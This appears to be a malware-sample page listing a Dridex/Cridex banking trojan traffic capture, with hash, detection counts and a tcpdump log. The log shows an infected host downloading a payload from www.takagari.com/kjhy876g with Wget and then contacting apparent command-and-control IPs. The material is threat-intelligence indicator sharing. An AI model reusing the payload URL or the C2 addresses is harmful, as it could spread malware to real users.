Banking Trojan Malware Cridex Dridex PCAP file download traffic sample www.takagari.com/kjhy876g

PCAP attachment: kjhy
Date added: January 26, 2018 5:43 am
Added by: admin
File size: 18 KB
47 engines detected this file
SHA-256 da135b38df8b6d87ecd98079b56eae725ae22e1846c14f4e0ed7a75a2290cdc8
File name output.112729552.txt
File size 148 KB
Last analysis 2018-01-24 11:48:36 UTC
Community score -229

 

 

2018-01-25 23:41:51.951964 IP 192.168.1.102.53269 > 69.163.163.39.80: Flags [P.], seq 145:294, ack 517, win 254, length 149: HTTP: GET /kjhy876g HTTP/1.1
GET /kjhy876g HTTP/1.1
User-Agent: Wget/1.19.4 (mingw32)
Accept: */*
Accept-Encoding: identity
Host: www.takagari.com
Connection: Keep-Alive

2018-01-25 23:42:27.263664 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [P.], seq 0:104, ack 1, win 256, length 104
2018-01-25 23:42:27.356227 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [P.], seq 104:430, ack 1096, win 252, length 326
2018-01-25 23:42:27.493411 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [.], ack 1155, win 252, length 0

2018-01-25 23:42:27.612023 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [P.], seq 4943:5304, ack 1155, win 252, length 361
2018-01-25 23:42:28.207936 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [.], ack 1369, win 251, length 0
2018-01-25 23:42:28.209338 IP 192.168.1.102.53271 > 69.90.132.196.443: Flags [F.], seq 5304, ack 1369, win 251, length 0
2018-01-25 23:42:45.981925 IP 192.168.1.102.60316 > 50.31.169.34.8253: UDP, length 20
2018-01-25 23:44:47.257224 IP 192.168.1.102.53273 > 89.171.146.30.4143: Flags [S], seq 833964971, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:44:47.896175 IP 192.168.1.102.53273 > 89.171.146.30.4143: Flags [S], seq 833964971, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:44:48.536919 IP 192.168.1.102.53273 > 89.171.146.30.4143: Flags [S], seq 833964971, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:44:49.181009 IP 192.168.1.102.53274 > 89.171.146.30.4143: Flags [S], seq 2126118763, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:44:49.820453 IP 192.168.1.102.53274 > 89.171.146.30.4143: Flags [S], seq 2126118763, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:44:50.461284 IP 192.168.1.102.53274 > 89.171.146.30.4143: Flags [S], seq 2126118763, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:44:51.102432 IP 192.168.1.102.53275 > 89.171.146.30.4143: Flags [S], seq 1713330700, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:44:51.742607 IP 192.168.1.102.53275 > 89.171.146.30.4143: Flags [S], seq 1713330700, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:44:52.383317 IP 192.168.1.102.53275 > 89.171.146.30.4143: Flags [S], seq 1713330700, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:46:53.547281 IP 192.168.1.102.53276 > 108.166.114.38.4443: Flags [S], seq 603444543, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:46:53.607370 IP 192.168.1.102.53276 > 108.166.114.38.4443: Flags [.], ack 3889905833, win 256, length 0
2018-01-25 23:46:53.614191 IP 192.168.1.102.53276 > 108.166.114.38.4443: Flags [P.], seq 0:104, ack 1, win 256, length 104
